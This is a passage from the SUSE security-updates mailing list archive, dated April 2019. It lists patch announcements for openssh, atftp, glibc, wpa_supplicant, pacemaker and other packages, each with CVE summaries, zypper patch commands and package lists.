auth2-hostbased.c, and auth2-pubkey.c. (bsc#1105010) Also the following security related hardening change was done: - Remove arcfour,cast,blowfish from list of default ciphers. (bsc#982273) And the following non-security issues were fixed: - Stop leaking File descriptors (bsc#964336) - sftp-client.c returns wrong error code upon failure (bsc#1091396) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1081=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): openssh-6.6p1-54.18.1 openssh-askpass-gnome-6.6p1-54.18.1 openssh-askpass-gnome-debuginfo-6.6p1-54.18.1 openssh-debuginfo-6.6p1-54.18.1 openssh-debugsource-6.6p1-54.18.1 openssh-fips-6.6p1-54.18.1 openssh-helpers-6.6p1-54.18.1 openssh-helpers-debuginfo-6.6p1-54.18.1 References: https://www.suse.com/security/cve/CVE-2018-15473.html https://www.suse.com/security/cve/CVE-2018-15919.html https://bugzilla.suse.com/1091396 https://bugzilla.suse.com/1105010 https://bugzilla.suse.com/1106163 https://bugzilla.suse.com/964336 https://bugzilla.suse.com/982273 From sle-security-updates at lists.suse.com Mon Apr 29 04:19:19 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:19:19 +0200 (CEST) Subject: SUSE-SU-2019:0125-2: important: Security update for openssh Message-ID: <20190429101919.F10E0F3D3@maintenance.suse.de> SUSE Security Update: Security update for openssh ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0125-2 Rating: important References: #1121571 #1121816 #1121818 #1121821 Cross-References: CVE-2018-20685 CVE-2019-6109 CVE-2019-6110 CVE-2019-6111 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes four vulnerabilities is now available. Description: This update for openssh fixes the following issues: Security issue fixed: - CVE-2018-20685: Fixed an issue where scp client allows remote SSH servers to bypass intended access restrictions (bsc#1121571) - CVE-2019-6109: Fixed an issue where the scp client would allow malicious remote SSH servers to manipulate terminal output via the object name, e.g. by inserting ANSI escape sequences (bsc#1121816) - CVE-2019-6110: Fixed an issue where the scp client would allow malicious remote SSH servers to manipulate stderr output, e.g. by inserting ANSI escape sequences (bsc#1121818) - CVE-2019-6111: Fixed an issue where the scp client would allow malicious remote SSH servers to execute directory traversal attacks and overwrite files (bsc#1121821) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-125=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): openssh-6.6p1-54.26.1 openssh-askpass-gnome-6.6p1-54.26.1 openssh-askpass-gnome-debuginfo-6.6p1-54.26.1 openssh-debuginfo-6.6p1-54.26.1 openssh-debugsource-6.6p1-54.26.1 openssh-fips-6.6p1-54.26.1 openssh-helpers-6.6p1-54.26.1 openssh-helpers-debuginfo-6.6p1-54.26.1 References: https://www.suse.com/security/cve/CVE-2018-20685.html https://www.suse.com/security/cve/CVE-2019-6109.html https://www.suse.com/security/cve/CVE-2019-6110.html https://www.suse.com/security/cve/CVE-2019-6111.html https://bugzilla.suse.com/1121571 https://bugzilla.suse.com/1121816 https://bugzilla.suse.com/1121818 https://bugzilla.suse.com/1121821 From sle-security-updates at lists.suse.com Mon Apr 29 04:21:29 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:21:29 +0200 (CEST) Subject: SUSE-SU-2019:0231-2: important: Security update for spice Message-ID: <20190429102129.2CCA2F3D3@maintenance.suse.de> SUSE Security Update: Security update for spice ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0231-2 Rating: important References: #1122706 Cross-References: CVE-2019-3813 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for spice fixes the following issues: Security issue fixed: - CVE-2019-3813: Fixed a out-of-bounds read in the memslot_get_virt function that could lead to denial-of-service or code-execution (bsc#1122706). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-231=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libspice-server1-0.12.5-10.2.3.1 libspice-server1-debuginfo-0.12.5-10.2.3.1 spice-debugsource-0.12.5-10.2.3.1 References: https://www.suse.com/security/cve/CVE-2019-3813.html https://bugzilla.suse.com/1122706 From sle-security-updates at lists.suse.com Mon Apr 29 04:22:13 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 12:22:13 +0200 (CEST) Subject: SUSE-SU-2018:3467-2: moderate: Security update for smt Message-ID: <20190429102213.8B503F3D4@maintenance.suse.de> SUSE Security Update: Security update for smt ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:3467-2 Rating: moderate References: #1104076 #1111056 Cross-References: CVE-2018-12472 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: SMT was updated to version 3.0.38. Following security issue was fixed: - CVE-2018-12472: Harden hostname check during sibling check by forcing double reverse lookup (bsc#1104076) Following non security issues were fixed: - Add migration path check when registration sharing is enabled - Fix sibling sync errors (bsc#1111056): - Synchronize all registered products - Handle duplicate registrations when syncing - Force resync to the sibling instance in `upgrade` and `synchronize` API calls Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1084=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): res-signingkeys-3.0.38-52.26.1 smt-3.0.38-52.26.1 smt-debuginfo-3.0.38-52.26.1 smt-debugsource-3.0.38-52.26.1 smt-support-3.0.38-52.26.1 References: https://www.suse.com/security/cve/CVE-2018-12472.html https://bugzilla.suse.com/1104076 https://bugzilla.suse.com/1111056 From sle-security-updates at lists.suse.com Mon Apr 29 07:11:19 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 15:11:19 +0200 (CEST) Subject: SUSE-SU-2019:1086-1: important: Security update for freeradius-server Message-ID: <20190429131119.8120CF3D4@maintenance.suse.de> SUSE Security Update: Security update for freeradius-server ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1086-1 Rating: important References: #1132549 #1132664 Cross-References: CVE-2019-11234 CVE-2019-11235 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for freeradius-server fixes the following issues: Security issues fixed: - CVE-2019-11235: Fixed an authentication bypass related to the EAP-PWD Commit frame and insufficent validation of elliptic curve points (bsc#1132549). - CVE-2019-11234: Fixed an authentication bypass caused by reflecting privous values back to the server (bsc#1132664). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-1086=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1086=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): freeradius-server-3.0.16-3.3.1 freeradius-server-debuginfo-3.0.16-3.3.1 freeradius-server-debugsource-3.0.16-3.3.1 freeradius-server-devel-3.0.16-3.3.1 freeradius-server-krb5-3.0.16-3.3.1 freeradius-server-krb5-debuginfo-3.0.16-3.3.1 freeradius-server-ldap-3.0.16-3.3.1 freeradius-server-ldap-debuginfo-3.0.16-3.3.1 freeradius-server-libs-3.0.16-3.3.1 freeradius-server-libs-debuginfo-3.0.16-3.3.1 freeradius-server-mysql-3.0.16-3.3.1 freeradius-server-mysql-debuginfo-3.0.16-3.3.1 freeradius-server-perl-3.0.16-3.3.1 freeradius-server-perl-debuginfo-3.0.16-3.3.1 freeradius-server-postgresql-3.0.16-3.3.1 freeradius-server-postgresql-debuginfo-3.0.16-3.3.1 freeradius-server-python-3.0.16-3.3.1 freeradius-server-python-debuginfo-3.0.16-3.3.1 freeradius-server-sqlite-3.0.16-3.3.1 freeradius-server-sqlite-debuginfo-3.0.16-3.3.1 freeradius-server-utils-3.0.16-3.3.1 freeradius-server-utils-debuginfo-3.0.16-3.3.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): freeradius-server-debuginfo-3.0.16-3.3.1 freeradius-server-debugsource-3.0.16-3.3.1 freeradius-server-doc-3.0.16-3.3.1 References: https://www.suse.com/security/cve/CVE-2019-11234.html https://www.suse.com/security/cve/CVE-2019-11235.html https://bugzilla.suse.com/1132549 https://bugzilla.suse.com/1132664 From sle-security-updates at lists.suse.com Mon Apr 29 10:11:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 18:11:31 +0200 (CEST) Subject: SUSE-SU-2019:1091-1: important: Security update for atftp Message-ID: <20190429161131.B2682F3D4@maintenance.suse.de> SUSE Security Update: Security update for atftp ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1091-1 Rating: important References: #1133114 #1133145 Cross-References: CVE-2019-11365 CVE-2019-11366 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for atftp fixes the following issues: Security issues fixed: - CVE-2019-11366: Fixed a denial of service caused by a NULL pointer dereference because thread_list_mutex was not locked (bsc#1133145). - CVE-2019-11365: Fixed a buffer overflow which could lead to remote code execution caused by an insecure use of strncpy() (bsc#1133114). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1091=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1091=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1091=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1091=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1091=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1091=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1091=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1091=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1091=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1091=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1091=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1091=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Enterprise Storage 4 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 References: https://www.suse.com/security/cve/CVE-2019-11365.html https://www.suse.com/security/cve/CVE-2019-11366.html https://bugzilla.suse.com/1133114 https://bugzilla.suse.com/1133145 From sle-security-updates at lists.suse.com Mon Apr 29 16:11:35 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 00:11:35 +0200 (CEST) Subject: SUSE-SU-2019:1088-1: moderate: Security update for wpa_supplicant Message-ID: <20190429221135.483B3F3D4@maintenance.suse.de> SUSE Security Update: Security update for wpa_supplicant ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1088-1 Rating: moderate References: #1104205 #1109209 Cross-References: CVE-2018-14526 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for wpa_supplicant fixes the following issues: This security issue was fixed: - CVE-2018-14526: Under certain conditions, the integrity of EAPOL-Key messages was not checked, leading to a decryption oracle. An attacker within range of the Access Point and client could have abused the vulnerability to recover sensitive information (bsc#1104205). This non-security issue was fixed: - Enabled PWD as EAP method. This allows for password-based authentication, which is easier to setup than most of the other methods, and is used by the Eduroam network (bsc#1109209). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1088=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1088=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1088=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1088=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1088=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1088=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1088=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1088=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1088=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1088=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1088=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Enterprise Storage 4 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 References: https://www.suse.com/security/cve/CVE-2018-14526.html https://bugzilla.suse.com/1104205 https://bugzilla.suse.com/1109209 From sle-security-updates at lists.suse.com Mon Apr 29 16:12:33 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 00:12:33 +0200 (CEST) Subject: SUSE-SU-2019:14033-1: important: Security update for atftp Message-ID: <20190429221233.9CAD5F3D4@maintenance.suse.de> SUSE Security Update: Security update for atftp ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14033-1 Rating: important References: #1133114 #1133145 Cross-References: CVE-2019-11365 CVE-2019-11366 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for atftp fixes the following issues: Security issues fixed: - CVE-2019-11366: Fixed a denial of service caused by a NULL pointer dereference because thread_list_mutex was not locked (bsc#1133145). - CVE-2019-11365: Fixed a buffer overflow which could lead to remote code execution caused by an insecure use of strncpy() (bsc#1133114). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-atftp-14033=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-atftp-14033=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-atftp-14033=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-atftp-14033=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): atftp-0.7.0-135.23.3.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): atftp-0.7.0-135.23.3.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): atftp-debuginfo-0.7.0-135.23.3.1 atftp-debugsource-0.7.0-135.23.3.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): atftp-debuginfo-0.7.0-135.23.3.1 atftp-debugsource-0.7.0-135.23.3.1 References: https://www.suse.com/security/cve/CVE-2019-11365.html https://www.suse.com/security/cve/CVE-2019-11366.html https://bugzilla.suse.com/1133114 https://bugzilla.suse.com/1133145 From sle-security-updates at lists.suse.com Tue Apr 30 07:09:29 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 15:09:29 +0200 (CEST) Subject: SUSE-SU-2019:1102-1: moderate: Security update for glibc Message-ID: <20190430130929.128DCF3D3@maintenance.suse.de> SUSE Security Update: Security update for glibc ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1102-1 Rating: moderate References: #1100396 #1110661 #1122729 #1127223 #1127308 #1128574 #1131994 Cross-References: CVE-2009-5155 CVE-2016-10739 CVE-2019-9169 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Desktop 12-SP4 ______________________________________________________________________________ An update that solves three vulnerabilities and has four fixes is now available. Description: This update for glibc fixes the following issues: Security issues fixed: - CVE-2019-9169: regex: fix read overrun (bsc#1127308, BZ #24114) - CVE-2016-10739: Fully parse IPv4 address strings (bsc#1122729, BZ #20018) - CVE-2009-5155: ERE '0|()0|\1|0' causes regexec undefined behavior (bsc#1127223, BZ #18986) Non-security issues fixed: - Enable TLE only if GLIBC_ELISION_ENABLE=yes is defined (bsc#1131994, fate#322271) - Add more checks for valid ld.so.cache file (bsc#1110661, BZ #18093) - Added cfi information for start routines in order to stop unwinding (bsc#1128574) - ja_JP locale: Add entry for the new Japanese era (bsc#1100396, fate#325570, BZ #22964) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1102=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1102=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1102=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): glibc-debuginfo-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-static-2.22-100.8.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (noarch): glibc-info-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): glibc-2.22-100.8.1 glibc-debuginfo-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-2.22-100.8.1 glibc-devel-debuginfo-2.22-100.8.1 glibc-locale-2.22-100.8.1 glibc-locale-debuginfo-2.22-100.8.1 glibc-profile-2.22-100.8.1 nscd-2.22-100.8.1 nscd-debuginfo-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): glibc-32bit-2.22-100.8.1 glibc-debuginfo-32bit-2.22-100.8.1 glibc-devel-32bit-2.22-100.8.1 glibc-devel-debuginfo-32bit-2.22-100.8.1 glibc-locale-32bit-2.22-100.8.1 glibc-locale-debuginfo-32bit-2.22-100.8.1 glibc-profile-32bit-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): glibc-html-2.22-100.8.1 glibc-i18ndata-2.22-100.8.1 glibc-info-2.22-100.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): glibc-2.22-100.8.1 glibc-32bit-2.22-100.8.1 glibc-debuginfo-2.22-100.8.1 glibc-debuginfo-32bit-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-2.22-100.8.1 glibc-devel-32bit-2.22-100.8.1 glibc-devel-debuginfo-2.22-100.8.1 glibc-devel-debuginfo-32bit-2.22-100.8.1 glibc-locale-2.22-100.8.1 glibc-locale-32bit-2.22-100.8.1 glibc-locale-debuginfo-2.22-100.8.1 glibc-locale-debuginfo-32bit-2.22-100.8.1 nscd-2.22-100.8.1 nscd-debuginfo-2.22-100.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): glibc-i18ndata-2.22-100.8.1 References: https://www.suse.com/security/cve/CVE-2009-5155.html https://www.suse.com/security/cve/CVE-2016-10739.html https://www.suse.com/security/cve/CVE-2019-9169.html https://bugzilla.suse.com/1100396 https://bugzilla.suse.com/1110661 https://bugzilla.suse.com/1122729 https://bugzilla.suse.com/1127223 https://bugzilla.suse.com/1127308 https://bugzilla.suse.com/1128574 https://bugzilla.suse.com/1131994 From sle-security-updates at lists.suse.com Tue Apr 30 10:10:26 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 18:10:26 +0200 (CEST) Subject: SUSE-SU-2019:1108-1: important: Security update for pacemaker Message-ID: <20190430161026.6A030F3D3@maintenance.suse.de> SUSE Security Update: Security update for pacemaker ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1108-1 Rating: important References: #1131353 #1131356 Cross-References: CVE-2018-16877 CVE-2018-16878 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise High Availability 12-SP3 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for pacemaker fixes the following issues: Security issues fixed: - CVE-2018-16877: Fixed a local privilege escalation through insufficient IPC client-server authentication. (bsc#1131356) - CVE-2018-16878: Fixed a denial of service through insufficient verification inflicted preference of uncontrolled processes. (bsc#1131353) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1108=1 - SUSE Linux Enterprise High Availability 12-SP3: zypper in -t patch SUSE-SLE-HA-12-SP3-2019-1108=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libpacemaker-devel-1.1.16-6.14.1 pacemaker-cts-1.1.16-6.14.1 pacemaker-cts-debuginfo-1.1.16-6.14.1 pacemaker-debuginfo-1.1.16-6.14.1 pacemaker-debugsource-1.1.16-6.14.1 - SUSE Linux Enterprise High Availability 12-SP3 (ppc64le s390x x86_64): libpacemaker3-1.1.16-6.14.1 libpacemaker3-debuginfo-1.1.16-6.14.1 pacemaker-1.1.16-6.14.1 pacemaker-cli-1.1.16-6.14.1 pacemaker-cli-debuginfo-1.1.16-6.14.1 pacemaker-cts-1.1.16-6.14.1 pacemaker-cts-debuginfo-1.1.16-6.14.1 pacemaker-debuginfo-1.1.16-6.14.1 pacemaker-debugsource-1.1.16-6.14.1 pacemaker-remote-1.1.16-6.14.1 pacemaker-remote-debuginfo-1.1.16-6.14.1 References: https://www.suse.com/security/cve/CVE-2018-16877.html https://www.suse.com/security/cve/CVE-2018-16878.html https://bugzilla.suse.com/1131353 https://bugzilla.suse.com/1131356 From sle-security-updates at lists.suse.com Tue Apr 30 13:09:50 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:09:50 +0200 (CEST) Subject: SUSE-SU-2019:1110-1: moderate: Security update for ovmf Message-ID: <20190430190950.E3586F3D3@maintenance.suse.de> SUSE Security Update: Security update for ovmf ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1110-1 Rating: moderate References: #1131361 Cross-References: CVE-2019-0161 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ovmf fixes the following issues: Security issue fixed: - CVE-2019-0161: Fixed a stack overflow in UsbBusDxe and UsbBusPei, which could potentially be triggered by a local unauthenticated user (bsc#1131361). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 